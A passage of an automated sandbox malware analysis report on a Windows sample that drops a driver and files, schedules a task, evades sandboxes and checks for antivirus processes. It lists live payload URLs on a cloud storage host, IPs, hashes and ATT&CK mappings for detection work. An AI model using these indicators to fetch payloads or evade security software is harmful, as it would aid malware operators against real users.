Source: C:\Users\user\Desktop\45631.exeDropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Documents\eSmF2v.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_4-14108
Source: C:\Users\user\Documents\eSmF2v.exeAPI coverage: 2.7 %
Source: C:\Users\user\Desktop\45631.exe TID: 2132Thread sleep count: 625 > 30Jump to behavior
Source: C:\Users\user\Desktop\45631.exe TID: 2132Thread sleep time: -312500s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\45631.exe TID: 2132Thread sleep count: 374 > 30Jump to behavior
Source: C:\Users\user\Desktop\45631.exe TID: 2132Thread sleep time: -187000s >= -30000sJump to behavior
Source: C:\Users\user\Documents\eSmF2v.exeLast function: Thread delayed
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_00007FF8BFB2A1B8 FindFirstFileExW,4_2_00007FF8BFB2A1B8
Source: C:\Users\user\Documents\eSmF2v.exeAPI call chain: ExitProcess graph end nodegraph_4-14109
Source: C:\Users\user\Documents\eSmF2v.exeAPI call chain: ExitProcess graph end nodegraph_4-14452
Source: C:\Users\user\Desktop\45631.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_00000001400073E0 LdrLoadDll,4_2_00000001400073E0
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0000000140007C91
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_000000014000F000
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,4_2_0000000140004630
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0000000140007C91
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00000001400106B0
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_00000001400092E0 SetUnhandledExceptionFilter,4_2_00000001400092E0
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_00007FF8BFB21F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF8BFB21F50
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_00007FF8BFB276E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF8BFB276E0
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_00007FF8BFB22630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF8BFB22630

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Documents\eSmF2v.exeNtAllocateVirtualMemory: Indirect: 0x140006FD0Jump to behavior
Source: C:\Users\user\Desktop\45631.exeNtDelayExecution: Indirect: 0x4D94CFJump to behavior
Source: C:\Users\user\Documents\eSmF2v.exeNtProtectVirtualMemory: Indirect: 0x28CB253Jump to behavior
Source: C:\Users\user\Documents\eSmF2v.exeNtProtectVirtualMemory: Indirect: 0x28EB253Jump to behavior
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_00007FF8BFB2FD40 cpuid 4_2_00007FF8BFB2FD40
Source: C:\Users\user\Documents\eSmF2v.exeCode function: GetLocaleInfoA,4_2_000000014000F370
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,4_2_000000014000A370
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,4_2_0000000140005A70
Source: eSmF2v.exe, 00000004.00000002.3099211360.00000000026B8000.00000002.00001000.00020000.00000000.sdmp, eSmF2v.exe, 00000005.00000002.3261092404.0000000002698000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: kxetray.exe
Source: eSmF2v.exe, 00000004.00000002.3099211360.00000000026B8000.00000002.00001000.00020000.00000000.sdmp, eSmF2v.exe, 00000005.00000002.3261092404.0000000002698000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: vsserv.exe
Source: eSmF2v.exe, 00000004.00000002.3099211360.00000000026B8000.00000002.00001000.00020000.00000000.sdmp, eSmF2v.exe, 00000005.00000002.3261092404.0000000002698000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avcenter.exe
Source: eSmF2v.exe, 00000004.00000002.3099211360.00000000026B8000.00000002.00001000.00020000.00000000.sdmp, eSmF2v.exe, 00000005.00000002.3261092404.0000000002698000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: KSafeTray.exe
Source: eSmF2v.exe, 00000004.00000002.3099211360.00000000026B8000.00000002.00001000.00020000.00000000.sdmp, eSmF2v.exe, 00000005.00000002.3261092404.0000000002698000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avp.exe
Source: eSmF2v.exe, 00000004.00000002.3099211360.00000000026B8000.00000002.00001000.00020000.00000000.sdmp, eSmF2v.exe, 00000005.00000002.3261092404.0000000002698000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360Safe.exe
Source: eSmF2v.exe, 00000004.00000002.3099211360.00000000026B8000.00000002.00001000.00020000.00000000.sdmp, eSmF2v.exe, 00000005.00000002.3261092404.0000000002698000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe
Source: eSmF2v.exe, 00000004.00000002.3099211360.00000000026B8000.00000002.00001000.00020000.00000000.sdmp, eSmF2v.exe, 00000005.00000002.3261092404.0000000002698000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: rtvscan.exe
Source: eSmF2v.exe, 00000004.00000002.3099211360.00000000026B8000.00000002.00001000.00020000.00000000.sdmp, eSmF2v.exe, 00000005.00000002.3261092404.0000000002698000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: ashDisp.exe
Source: eSmF2v.exe, 00000004.00000002.3099211360.00000000026B8000.00000002.00001000.00020000.00000000.sdmp, eSmF2v.exe, 00000005.00000002.3261092404.0000000002698000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
Source: eSmF2v.exe, 00000004.00000002.3099211360.00000000026B8000.00000002.00001000.00020000.00000000.sdmp, eSmF2v.exe, 00000005.00000002.3261092404.0000000002698000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avgwdsvc.exe
Source: eSmF2v.exe, 00000004.00000002.3099211360.00000000026B8000.00000002.00001000.00020000.00000000.sdmp, eSmF2v.exe, 00000005.00000002.3261092404.0000000002698000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: AYAgent.aye
Source: eSmF2v.exe, 00000004.00000002.3099211360.00000000026B8000.00000002.00001000.00020000.00000000.sdmp, eSmF2v.exe, 00000005.00000002.3261092404.0000000002698000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: QUHLPSVC.EXE
Source: eSmF2v.exe, 00000004.00000002.3099211360.00000000026B8000.00000002.00001000.00020000.00000000.sdmp, eSmF2v.exe, 00000005.00000002.3261092404.0000000002698000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: RavMonD.exe
Source: eSmF2v.exe, 00000004.00000002.3099211360.00000000026B8000.00000002.00001000.00020000.00000000.sdmp, eSmF2v.exe, 00000005.00000002.3261092404.0000000002698000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
Source: eSmF2v.exe, 00000004.00000002.3099211360.00000000026B8000.00000002.00001000.00020000.00000000.sdmp, eSmF2v.exe, 00000005.00000002.3261092404.0000000002698000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: K7TSecurity.exe
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,4_2_00000001400042B0
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,4_2_0000000140003F80
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
Service Execution
24
Windows Service
1
Access Token Manipulation
31
Masquerading
1
Credential API Hooking
1
System Time Discovery
Remote Services1
Credential API Hooking
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Native API
1
DLL Side-Loading
24
Windows Service
1
Virtualization/Sandbox Evasion
LSASS Memory13
Security Software Discovery
Remote Desktop Protocol1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Process Injection
1
Access Token Manipulation
Security Account Manager1
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
Abuse Elevation Control Mechanism
1
Process Injection
NTDS1
Process Discovery
Distributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
DLL Side-Loading
1
Abuse Elevation Control Mechanism
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Obfuscated Files or Information
Cached Domain Credentials1
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading
DCSync123
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
45631.exe38%VirustotalBrowse
45631.exe100%AviraHEUR/AGEN.1311196
SourceDetectionScannerLabelLink
C:\Users\user\Documents\eSmF2v.exe0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://ry2ihs.oss-cn-beijing.aliyuncs.com/s.jpg0%Avira URL Cloudsafe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gif0%Avira URL Cloudsafe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/i.dat0%Avira URL Cloudsafe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif0%Avira URL Cloudsafe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gifhttps://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gifhttp0%Avira URL Cloudsafe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/d.gif0%Avira URL Cloudsafe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gifjing.aliyuncs.com/N0%Avira URL Cloudsafe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/c.gif0%Avira URL Cloudsafe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/s.dat0%Avira URL Cloudsafe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/M0%Avira URL Cloudsafe
https://ry2ihs.oss-cn-beijing.aliyuncs.com/0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
sc-2cuv.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com
39.103.20.59
truefalse
    high
    ry2ihs.oss-cn-beijing.aliyuncs.com
    unknown
    unknownfalse
      unknown
      NameMaliciousAntivirus DetectionReputation
      https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.giffalse
      • Avira URL Cloud: safe
      unknown
      https://ry2ihs.oss-cn-beijing.aliyuncs.com/s.jpgfalse
      • Avira URL Cloud: safe
      unknown
      https://ry2ihs.oss-cn-beijing.aliyuncs.com/s.datfalse
      • Avira URL Cloud: safe
      unknown
      https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.giffalse
      • Avira URL Cloud: safe
      unknown
      https://ry2ihs.oss-cn-beijing.aliyuncs.com/c.giffalse
      • Avira URL Cloud: safe
      unknown
      https://ry2ihs.oss-cn-beijing.aliyuncs.com/i.datfalse
      • Avira URL Cloud: safe
      unknown
      https://ry2ihs.oss-cn-beijing.aliyuncs.com/d.giffalse
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://crl.thawte.com/ThawteTimestampingCA.crl045631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, eSmF2v.exe.0.drfalse
        high
        http://www.symauth.com/rpa0045631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, eSmF2v.exe.0.drfalse
          high
          https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gifhttps://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gifhttp45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gifjing.aliyuncs.com/N45631.exe, 00000000.00000003.2965202615.0000000000605000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://ocsp.thawte.com045631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, eSmF2v.exe.0.drfalse
            high
            http://www.symauth.com/cps0(45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, eSmF2v.exe.0.drfalse
              high
              https://ry2ihs.oss-cn-beijing.aliyuncs.com/M45631.exe, 00000000.00000003.2965202615.0000000000605000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://ry2ihs.oss-cn-beijing.aliyuncs.com/45631.exe, 00000000.00000003.2965202615.0000000000605000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              39.103.20.59
              sc-2cuv.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.comChina
              37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1583301
              Start date and time:2025-01-02 12:06:12 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 5m 40s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:6
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:45631.exe
              Detection:MAL
              Classification:mal88.evad.winEXE@3/12@1/1
              EGA Information:
              • Successful, ratio: 50%
              HCA Information:Failed
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
              • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target eSmF2v.exe, PID 4676 because there are no executed function
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              TimeTypeDescription
              06:07:06API Interceptor941x Sleep call for process: 45631.exe modified
              12:08:48Task SchedulerRun new task: HCyGO path: C:\Users\user\Documents\eSmF2v.exe
              No context
              No context
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdHilix.m68k.elfGet hashmaliciousMiraiBrowse
              • 8.155.218.222
              1735021454574.exeGet hashmaliciousUnknownBrowse
              • 120.78.149.238
              1734098836319.exeGet hashmaliciousBlackMoonBrowse
              • 39.103.20.61
              armv4l.elfGet hashmaliciousUnknownBrowse
              • 59.82.127.195
              armv6l.elfGet hashmaliciousUnknownBrowse
              • 39.106.221.219
              DF2.exeGet hashmaliciousUnknownBrowse
              • 59.110.52.4
              loligang.sh4.elfGet hashmaliciousMiraiBrowse
              • 121.198.26.154
              loligang.arm7.elfGet hashmaliciousMiraiBrowse
              • 47.103.186.206
              loligang.spc.elfGet hashmaliciousMiraiBrowse
              • 8.130.21.60
              0000000000000000.exeGet hashmaliciousNitolBrowse
              • 39.103.20.97
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              37f463bf4616ecd445d4a1937da06e191734098836319.exeGet hashmaliciousBlackMoonBrowse
              • 39.103.20.59
              ETVk1yP43q.exeGet hashmaliciousAZORultBrowse
              • 39.103.20.59
              16oApcahEa.exeGet hashmaliciousBabuk, DjvuBrowse
              • 39.103.20.59
              6a7e35.msiGet hashmaliciousUnknownBrowse
              • 39.103.20.59
              ipmsg5.6.18_installer.exeGet hashmaliciousUnknownBrowse
              • 39.103.20.59
              OXoeX1Ii3x.exeGet hashmaliciousUnknownBrowse
              • 39.103.20.59
              OXoeX1Ii3x.exeGet hashmaliciousUnknownBrowse
              • 39.103.20.59
              0000000000000000.exeGet hashmaliciousNitolBrowse
              • 39.103.20.59
              0000000000000000.exeGet hashmaliciousUnknownBrowse
              • 39.103.20.59
              1.ps1Get hashmaliciousUnknownBrowse
              • 39.103.20.59
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              C:\Users\user\Documents\eSmF2v.exe0000000000000000.exeGet hashmaliciousNitolBrowse
                0000000000000000.exeGet hashmaliciousUnknownBrowse
                  T1#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousNitolBrowse
                    Process:C:\Users\user\Desktop\45631.exe
                    File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                    Category:dropped
                    Size (bytes):125333
                    Entropy (8bit):7.993522712936246
                    Encrypted:true
                    SSDEEP:3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
                    MD5:2CA9F4AB0970AA58989D66D9458F8701
                    SHA1:FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
                    SHA-256:5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
                    SHA-512:AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
                    Malicious:false
                    Reputation:low
                    Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                    Process:C:\Users\user\Desktop\45631.exe
                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                    Category:dropped
                    Size (bytes):8299
                    Entropy (8bit):7.9354275320361545
                    Encrypted:false
                    SSDEEP:192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
                    MD5:9BDB6A4AF681470B85A3D46AF5A4F2A7
                    SHA1:D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
                    SHA-256:5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
                    SHA-512:5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
                    Malicious:false
                    Reputation:low
                    Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE...............CHI........[..>G..*C..&.!7*..E..)U&.$...z.tuv......?..............
                    Process:C:\Users\user\Desktop\45631.exe
                    File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                    Category:dropped
                    Size (bytes):135589
                    Entropy (8bit):7.995304392539578
                    Encrypted:true
                    SSDEEP:3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
                    MD5:0DDD3F02B74B01D739C45956D8FD12B7
                    SHA1:561836F6228E24180238DF9456707A2443C5795C
                    SHA-256:2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
                    SHA-512:0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
                    Malicious:false
                    Reputation:low
                    Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                    Process:C:\Users\user\Desktop\45631.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):28272
                    Entropy (8bit):7.711440004173835
                    Encrypted:false
                    SSDEEP:384:90egCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQw:n5F1FUdy422IK+gAZt2i0YPpQn4GML
                    MD5:4EC8DE8386092D80236CAFAEF929A784
                    SHA1:F9FA966EC161C2E06E6B78E5B6106A743E2637A6
                    SHA-256:9A4D3341B75AC2DAF161BAC0B7E82F6170EAEE626B04C652EA34044BC98975B3
                    SHA-512:F498BE951D0CEA15622CF6DC4C9BE7E0BBA2BF5B343C912F77823D2FEEAF37FCD8B4C776F74DACC2892B43B4D2D80F03C9C6209D7A51487EA7EEA3812BA3D983
                    Malicious:false
                    Preview:..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbb..bbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
                    Process:C:\Users\user\Desktop\45631.exe
                    File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                    Category:dropped
                    Size (bytes):10681
                    Entropy (8bit):7.866148090449211
                    Encrypted:false
                    SSDEEP:192:fN3El4oBtN9pmD65VoeotpeGy/nmgVtKFbM/PvMZ5ZWtZl4EehHGXI9Fch5:fN3E7NW27oJWJ+M/8ZCDuEe2I9FS5
                    MD5:10A818386411EE834D99AE6B7B68BE71
                    SHA1:27644B42B02F00E772DCCB8D3E5C6976C4A02386
                    SHA-256:7545AC54F4BDFE8A9A271D30A233F8717CA692A6797CA775DE1B7D3EAAB1E066
                    SHA-512:BDC5F1C9A78CA677D8B7AFA2C2F0DE95337C5850F794B66D42CAE6641EF1F8D24D0F0E98D295F35E71EBE60760AD17DA1F682472D7E4F61613441119484EFB8F
                    Malicious:false
                    Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                    Process:C:\Users\user\Desktop\45631.exe
